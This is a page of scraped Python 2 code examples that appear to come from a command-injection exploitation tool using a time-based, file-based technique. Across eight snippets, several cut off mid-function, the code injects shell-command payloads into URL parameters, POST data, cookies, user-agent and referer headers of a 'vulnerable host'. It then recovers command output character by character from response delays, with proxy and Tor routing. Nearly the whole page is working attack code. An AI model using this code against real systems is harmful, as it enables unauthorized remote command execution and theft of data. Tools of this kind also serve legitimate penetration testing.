Exemplo n.º 1
0
def injection(separator,maxlen,TAG,cmd,delay,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell):
  if menu.options.file_write or menu.options.file_upload :
    minlen = 0
  else:
    minlen = 1
    
  print "\n(*) Retrieving the length of execution output..."
  for j in range(int(minlen),int(maxlen)):
    
    # Execute shell commands on vulnerable host.
    if not alter_shell :
      payload = tfb_payloads.cmd_execution(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)
    else:
      payload = tfb_payloads.cmd_execution_alter_shell(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)

    # Check if defined "--verbose" option.
    if menu.options.verbose:
      sys.stdout.write("\n" + colors.GREY + payload.replace("\n","\\n") + colors.RESET)
      
    start = 0
    end = 0
    start = time.time()
    
    # Check if defined method is GET (Default).
    if http_request_method == "GET":
      payload = urllib.quote(payload)
      
      # Check if its not specified the 'INJECT_HERE' tag
      url = parameters.do_GET_check(url)
      
      target = re.sub(settings.INJECT_TAG, payload, url)
      vuln_parameter = ''.join(vuln_parameter)
      
      #print target
      request = urllib2.Request(target)
  
      # Check if defined extra headers.
      headers.do_check(request)
		      
      # Check if defined any HTTP Proxy.
      if menu.options.proxy:
	try:
	  proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	  opener = urllib2.build_opener(proxy)
	  urllib2.install_opener(opener)
	  response = urllib2.urlopen(request)
	  response.read()
	except urllib2.HTTPError, err:
	  print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
	  sys.exit(1) 
  
      else:
	try:
	  response = urllib2.urlopen(request)
	  response.read()
	except urllib2.HTTPError, err:
	  print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
	  sys.exit(1) 
Exemplo n.º 2
0
def false_positive_check(
    separator,
    TAG,
    cmd,
    prefix,
    suffix,
    delay,
    http_request_method,
    url,
    vuln_parameter,
    OUTPUT_TEXTFILE,
    randvcalc,
    alter_shell,
):

    found_chars = False
    if menu.options.verbose:
        sys.stdout.write("\n(*) Testing the reliability of used payload... ")
        sys.stdout.flush()

    for output_length in range(1, 3):

        # Execute shell commands on vulnerable host.
        if alter_shell:
            payload = tfb_payloads.cmd_execution_alter_shell(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method
            )
        else:
            payload = tfb_payloads.cmd_execution(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method
            )

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        if menu.options.base64:
            payload = base64.b64encode(payload)

        # Check if defined "--verbose" option.
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            how_long = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            how_long = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            how_long = referer_injection_test(url, vuln_parameter, payload)

        else:
            how_long = examine_requests(payload, vuln_parameter, http_request_method, url)

        if how_long >= delay:
            found_chars = True
            break

    if found_chars == True:
        num_of_chars = output_length + 1
        check_start = 0
        check_end = 0
        check_start = time.time()

        output = []
        percent = 0

        for num_of_chars in range(1, int(num_of_chars)):
            for ascii_char in range(1, 3):

                # Get the execution ouput, of shell execution.
                if alter_shell:
                    payload = tfb_payloads.fp_result_alter_shell(
                        separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method
                    )
                else:
                    payload = tfb_payloads.fp_result(separator, OUTPUT_TEXTFILE, ascii_char, delay, http_request_method)

                # Fix prefixes / suffixes
                payload = parameters.prefixes(payload, prefix)
                payload = parameters.suffixes(payload, suffix)

                if menu.options.base64:
                    payload = base64.b64encode(payload)

                # Check if defined "--verbose" option.
                if menu.options.verbose:
                    sys.stdout.write(
                        "\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL
                    )

                # Check if defined cookie with "INJECT_HERE" tag
                if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
                    how_long = cookie_injection_test(url, vuln_parameter, payload)

                # Check if defined user-agent with "INJECT_HERE" tag
                elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
                    how_long = user_agent_injection_test(url, vuln_parameter, payload)

                # Check if defined referer with "INJECT_HERE" tag
                elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
                    how_long = referer_injection_test(url, vuln_parameter, payload)

                else:
                    how_long = examine_requests(payload, vuln_parameter, http_request_method, url)

                if how_long >= delay:
                    output.append(ascii_char)
                    break

        check_end = time.time()
        check_how_long = int(check_end - check_start)
        output = "".join(str(p) for p in output)

        if str(output) == str(randvcalc):
            return output
Exemplo n.º 3
0
def injection(
    separator,
    maxlen,
    TAG,
    cmd,
    prefix,
    suffix,
    delay,
    http_request_method,
    url,
    vuln_parameter,
    OUTPUT_TEXTFILE,
    alter_shell,
):
    if menu.options.file_write or menu.options.file_upload:
        minlen = 0
    else:
        minlen = 1

    found_chars = False
    sys.stdout.write("\n(*) Retrieving the length of execution output... ")
    sys.stdout.flush()
    for output_length in range(int(minlen), int(maxlen)):

        # Execute shell commands on vulnerable host.
        if alter_shell:
            payload = tfb_payloads.cmd_execution_alter_shell(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method
            )
        else:
            payload = tfb_payloads.cmd_execution(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method
            )

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        if menu.options.base64:
            payload = base64.b64encode(payload)

        # Check if defined "--verbose" option.
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            how_long = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            how_long = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            how_long = referer_injection_test(url, vuln_parameter, payload)

        else:
            how_long = examine_requests(payload, vuln_parameter, http_request_method, url)

        if how_long >= delay:
            if menu.options.verbose:
                print "\n"
            else:
                sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n")
                sys.stdout.flush()
            print Style.BRIGHT + "(!) Retrieved " + str(output_length) + " characters." + Style.RESET_ALL
            found_chars = True
            break

    if found_chars == True:
        num_of_chars = output_length + 1
        check_start = 0
        check_end = 0
        check_start = time.time()

        output = []

        percent = 0
        sys.stdout.write(
            "\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE + "', please wait... [ " + str(percent) + "% ]"
        )
        sys.stdout.flush()

        for num_of_chars in range(1, int(num_of_chars)):
            for ascii_char in range(32, 129):

                # Get the execution ouput, of shell execution.
                if alter_shell:
                    payload = tfb_payloads.get_char_alter_shell(
                        separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method
                    )
                else:
                    payload = tfb_payloads.get_char(
                        separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method
                    )

                # Fix prefixes / suffixes
                payload = parameters.prefixes(payload, prefix)
                payload = parameters.suffixes(payload, suffix)

                if menu.options.base64:
                    payload = base64.b64encode(payload)

                # Check if defined "--verbose" option.
                if menu.options.verbose:
                    sys.stdout.write(
                        "\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL
                    )

                # Check if defined cookie with "INJECT_HERE" tag
                if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
                    how_long = cookie_injection_test(url, vuln_parameter, payload)

                # Check if defined user-agent with "INJECT_HERE" tag
                elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
                    how_long = user_agent_injection_test(url, vuln_parameter, payload)

                # Check if defined referer with "INJECT_HERE" tag
                elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
                    how_long = referer_injection_test(url, vuln_parameter, payload)

                else:
                    how_long = examine_requests(payload, vuln_parameter, http_request_method, url)

                if how_long >= delay:
                    if not menu.options.verbose:
                        output.append(chr(ascii_char))
                        percent = (num_of_chars * 100) / output_length
                        float_percent = "{0:.1f}".format(round(((num_of_chars * 100) / (output_length * 1.0)), 2))

                        sys.stdout.write(
                            "\r(*) Grabbing the output from '"
                            + OUTPUT_TEXTFILE
                            + "', please wait... [ "
                            + str(float_percent)
                            + "% ]"
                        )
                        sys.stdout.flush()
                    else:
                        output.append(chr(ascii_char))
                    break

        check_end = time.time()
        check_how_long = int(check_end - check_start)
        output = "".join(str(p) for p in output)

    else:
        check_start = 0
        sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]\n")
        sys.stdout.flush()
        check_how_long = 0
        output = ""

    return check_how_long, output
Exemplo n.º 4
0
def injection(separator, maxlen, TAG, cmd, delay, http_request_method, url,
              vuln_parameter, OUTPUT_TEXTFILE, alter_shell):
    if menu.options.file_write or menu.options.file_upload:
        minlen = 0
    else:
        minlen = 1

    found_chars = False
    sys.stdout.write("\n(*) Retrieving the length of execution output... ")
    sys.stdout.flush()
    for output_length in range(int(minlen), int(maxlen)):

        # Execute shell commands on vulnerable host.
        if not alter_shell:
            payload = tfb_payloads.cmd_execution(separator, cmd, output_length,
                                                 OUTPUT_TEXTFILE, delay,
                                                 http_request_method)
        else:
            payload = tfb_payloads.cmd_execution_alter_shell(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay,
                http_request_method)

        # Check if defined "--verbose" option.
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") +
                             Style.RESET_ALL)

        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            how_long = cookie_injection_test(url, vuln_parameter, payload)

        else:
            start = 0
            end = 0
            start = time.time()

            # Check if defined method is GET (Default).
            if http_request_method == "GET":
                payload = urllib.quote(payload)

                # Check if its not specified the 'INJECT_HERE' tag
                url = parameters.do_GET_check(url)

                target = re.sub(settings.INJECT_TAG, payload, url)
                vuln_parameter = ''.join(vuln_parameter)

                #print target
                request = urllib2.Request(target)

                # Check if defined extra headers.
                headers.do_check(request)

                # Check if defined any HTTP Proxy.
                if menu.options.proxy:
                    try:
                        response = proxy.use_proxy(request)
                    except urllib2.HTTPError, err:
                        print "\n" + Back.RED + "(x) Error : " + str(
                            err) + Style.RESET_ALL
                        raise SystemExit()

                # Check if defined Tor.
                elif menu.options.tor:
                    try:
                        response = tor.use_tor(request)
                    except urllib2.HTTPError, err:
                        print "\n" + Back.RED + "(x) Error : " + str(
                            err) + Style.RESET_ALL
                        raise SystemExit()

                else:
                    try:
                        response = urllib2.urlopen(request)
                    except urllib2.HTTPError, err:
                        print "\n" + Back.RED + "(x) Error : " + str(
                            err) + Style.RESET_ALL
                        raise SystemExit()
Exemplo n.º 5
0
def injection(separator, maxlen, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell):
  if menu.options.file_write or menu.options.file_upload :
    minlen = 0
  else:
    minlen = 1
    
  found_chars = False
  sys.stdout.write("\n(*) Retrieving the length of execution output... ")
  sys.stdout.flush()  
  for output_length in range(int(minlen), int(maxlen)):
    
    # Execute shell commands on vulnerable host.
    if not alter_shell :
      payload = tfb_payloads.cmd_execution(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)
    else:
      payload = tfb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)

    # Check if defined "--verbose" option.
    if menu.options.verbose:
      sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)

    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      how_long = cookie_injection_test(url, vuln_parameter, payload)

    else:
      start = 0
      end = 0
      start = time.time()
      
      # Check if defined method is GET (Default).
      if http_request_method == "GET":
        payload = urllib.quote(payload)
        
        # Check if its not specified the 'INJECT_HERE' tag
        url = parameters.do_GET_check(url)
        
        target = re.sub(settings.INJECT_TAG, payload, url)
        vuln_parameter = ''.join(vuln_parameter)
        
        #print target
        request = urllib2.Request(target)
    
        # Check if defined extra headers.
        headers.do_check(request)
                        
        # Check if defined any HTTP Proxy.
        if menu.options.proxy:
          try:
            response = proxy.use_proxy(request)
          except urllib2.HTTPError, err:
            print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
            raise SystemExit() 

        # Check if defined Tor.
        elif menu.options.tor:
          try:
            response = tor.use_tor(request)
          except urllib2.HTTPError, err:
            print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
            raise SystemExit() 

        else:
          try:
            response = urllib2.urlopen(request)
          except urllib2.HTTPError, err:
            print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
            raise SystemExit() 
Exemplo n.º 6
0
def false_positive_check(separator, TAG, cmd, prefix, suffix, delay,
                         http_request_method, url, vuln_parameter,
                         OUTPUT_TEXTFILE, randvcalc, alter_shell):

    found_chars = False
    if menu.options.verbose:
        sys.stdout.write("\n(*) Testing the reliability of used payload... ")
        sys.stdout.flush()

    for output_length in range(1, 3):

        # Execute shell commands on vulnerable host.
        if alter_shell:
            payload = tfb_payloads.cmd_execution_alter_shell(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay,
                http_request_method)
        else:
            payload = tfb_payloads.cmd_execution(separator, cmd, output_length,
                                                 OUTPUT_TEXTFILE, delay,
                                                 http_request_method)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        if menu.options.base64:
            payload = base64.b64encode(payload)

        # Check if defined "--verbose" option.
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
                             payload.replace("\n", "\\n") + Style.RESET_ALL)

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            how_long = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            how_long = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            how_long = referer_injection_test(url, vuln_parameter, payload)

        else:
            how_long = examine_requests(payload, vuln_parameter,
                                        http_request_method, url)

        if how_long >= delay:
            found_chars = True
            break

    if found_chars == True:
        num_of_chars = output_length + 1
        check_start = 0
        check_end = 0
        check_start = time.time()

        output = []
        percent = 0

        for num_of_chars in range(1, int(num_of_chars)):
            for ascii_char in range(1, 3):

                # Get the execution ouput, of shell execution.
                if alter_shell:
                    payload = tfb_payloads.fp_result_alter_shell(
                        separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char,
                        delay, http_request_method)
                else:
                    payload = tfb_payloads.fp_result(separator,
                                                     OUTPUT_TEXTFILE,
                                                     ascii_char, delay,
                                                     http_request_method)

                # Fix prefixes / suffixes
                payload = parameters.prefixes(payload, prefix)
                payload = parameters.suffixes(payload, suffix)

                if menu.options.base64:
                    payload = base64.b64encode(payload)

                # Check if defined "--verbose" option.
                if menu.options.verbose:
                    sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
                                     payload.replace("\n", "\\n") +
                                     Style.RESET_ALL)

                # Check if defined cookie with "INJECT_HERE" tag
                if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
                    how_long = cookie_injection_test(url, vuln_parameter,
                                                     payload)

                # Check if defined user-agent with "INJECT_HERE" tag
                elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
                    how_long = user_agent_injection_test(
                        url, vuln_parameter, payload)

                # Check if defined referer with "INJECT_HERE" tag
                elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
                    how_long = referer_injection_test(url, vuln_parameter,
                                                      payload)

                else:
                    how_long = examine_requests(payload, vuln_parameter,
                                                http_request_method, url)

                if how_long >= delay:
                    output.append(ascii_char)
                    break

        check_end = time.time()
        check_how_long = int(check_end - check_start)
        output = "".join(str(p) for p in output)

        if str(output) == str(randvcalc):
            return output
Exemplo n.º 7
0
def injection(separator, maxlen, TAG, cmd, prefix, suffix, delay,
              http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE,
              alter_shell, filename):
    if menu.options.file_write or menu.options.file_upload:
        minlen = 0
    else:
        minlen = 1

    found_chars = False

    sys.stdout.write("(*) Retrieving the length of execution output... ")
    sys.stdout.flush()
    for output_length in range(int(minlen), int(maxlen)):

        # Execute shell commands on vulnerable host.
        if alter_shell:
            payload = tfb_payloads.cmd_execution_alter_shell(
                separator, cmd, output_length, OUTPUT_TEXTFILE, delay,
                http_request_method)
        else:
            payload = tfb_payloads.cmd_execution(separator, cmd, output_length,
                                                 OUTPUT_TEXTFILE, delay,
                                                 http_request_method)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        if menu.options.base64:
            payload = base64.b64encode(payload)

        # Check if defined "--verbose" option.
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
                             payload.replace("\n", "\\n") + Style.RESET_ALL)

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            how_long = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            how_long = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            how_long = referer_injection_test(url, vuln_parameter, payload)

        else:
            how_long = examine_requests(payload, vuln_parameter,
                                        http_request_method, url)

        if how_long >= delay:
            if output_length > 1:
                if menu.options.verbose:
                    print "\n"
                else:
                    sys.stdout.write("[" + Fore.GREEN + " SUCCEED " +
                                     Style.RESET_ALL + "]\n")
                    sys.stdout.flush()
                print Style.BRIGHT + "(!) Retrieved " + str(
                    output_length) + " characters." + Style.RESET_ALL
                found_chars = True
            break

    if found_chars == True:
        num_of_chars = output_length + 1
        check_start = 0
        check_end = 0
        check_start = time.time()

        output = []

        percent = 0
        sys.stdout.write("\r(*) Grabbing the output from '" + OUTPUT_TEXTFILE +
                         "', please wait... [ " + str(percent) + "% ]")
        sys.stdout.flush()

        for num_of_chars in range(1, int(num_of_chars)):
            for ascii_char in range(32, 129):

                # Get the execution ouput, of shell execution.
                if alter_shell:
                    payload = tfb_payloads.get_char_alter_shell(
                        separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char,
                        delay, http_request_method)
                else:
                    payload = tfb_payloads.get_char(separator, OUTPUT_TEXTFILE,
                                                    num_of_chars, ascii_char,
                                                    delay, http_request_method)

                # Fix prefixes / suffixes
                payload = parameters.prefixes(payload, prefix)
                payload = parameters.suffixes(payload, suffix)

                if menu.options.base64:
                    payload = base64.b64encode(payload)

                # Check if defined "--verbose" option.
                if menu.options.verbose:
                    sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
                                     payload.replace("\n", "\\n") +
                                     Style.RESET_ALL)

                # Check if defined cookie with "INJECT_HERE" tag
                if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
                    how_long = cookie_injection_test(url, vuln_parameter,
                                                     payload)

                # Check if defined user-agent with "INJECT_HERE" tag
                elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
                    how_long = user_agent_injection_test(
                        url, vuln_parameter, payload)

                # Check if defined referer with "INJECT_HERE" tag
                elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
                    how_long = referer_injection_test(url, vuln_parameter,
                                                      payload)

                else:
                    how_long = examine_requests(payload, vuln_parameter,
                                                http_request_method, url)

                if how_long >= delay:
                    if not menu.options.verbose:
                        output.append(chr(ascii_char))
                        percent = ((num_of_chars * 100) / output_length)
                        float_percent = "{0:.1f}".format(
                            round(
                                ((num_of_chars * 100) / (output_length * 1.0)),
                                2))

                        sys.stdout.write("\r(*) Grabbing the output from '" +
                                         OUTPUT_TEXTFILE +
                                         "', please wait... [ " +
                                         str(float_percent) + "% ]")
                        sys.stdout.flush()
                    else:
                        output.append(chr(ascii_char))
                    break

        check_end = time.time()
        check_how_long = int(check_end - check_start)
        output = "".join(str(p) for p in output)

    else:
        check_start = 0
        if not menu.options.verbose:
            sys.stdout.write("[" + Fore.RED + " FAILED " + Style.RESET_ALL +
                             "]\n")
            sys.stdout.flush()
        else:
            print ""
        check_how_long = 0
        output = ""

    return check_how_long, output
Exemplo n.º 8
0
def injection(separator,maxlen,TAG,cmd,delay,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell):

  print "\n(*) Retrieving the length of execution output..."
  for j in range(1,int(maxlen)):
    
    # Execute shell commands on vulnerable host.
    if not alter_shell :
      payload = tfb_payloads.cmd_execution(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)
    else:
      payload = tfb_payloads.cmd_execution_alter_shell(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)

    # Check if defined "--verbose" option.
    if menu.options.verbose:
      sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
      
    start = 0
    end = 0
    start = time.time()
    
    # Check if defined method is GET (Default).
    if http_request_method == "GET":
      payload = urllib.quote(payload)
      
      # Check if its not specified the 'INJECT_HERE' tag
      url = parameters.do_GET_check(url)
      
      target = re.sub(settings.INJECT_TAG, payload, url)
      vuln_parameter = ''.join(vuln_parameter)
      
      #print target
      request = urllib2.Request(target)
  
      # Check if defined extra headers.
      headers.do_check(request)
		      
      # Check if defined any HTTP Proxy.
      if menu.options.proxy:
	try:
	  proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	  opener = urllib2.build_opener(proxy)
	  urllib2.install_opener(opener)
	  response = urllib2.urlopen(request)
	  response.read()
	  
	except urllib2.HTTPError, err:
	  print "\n(x) Error : " + str(err)
	  sys.exit(1) 
  
      else:
	response = urllib2.urlopen(request)
	response.read()
	
    # Check if defined method is POST.
    else :
      parameter = menu.options.data
      parameter = urllib2.unquote(parameter)
      
      # Check if its not specified the 'INJECT_HERE' tag
      parameter = parameters.do_POST_check(parameter)
      
      data = re.sub(settings.INJECT_TAG, payload, parameter)
      request = urllib2.Request(url, data)
      
      # Check if defined extra headers.
      headers.do_check(request)

      # Check if defined any HTTP Proxy.
      if menu.options.proxy:
	try:
	  proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	  opener = urllib2.build_opener(proxy)
	  urllib2.install_opener(opener)
	  response = urllib2.urlopen(request)
	  response.read()
	  
	except urllib2.HTTPError, err:
	  print "\n(x) Error : " + str(err)
	  sys.exit(1) 
  
      else: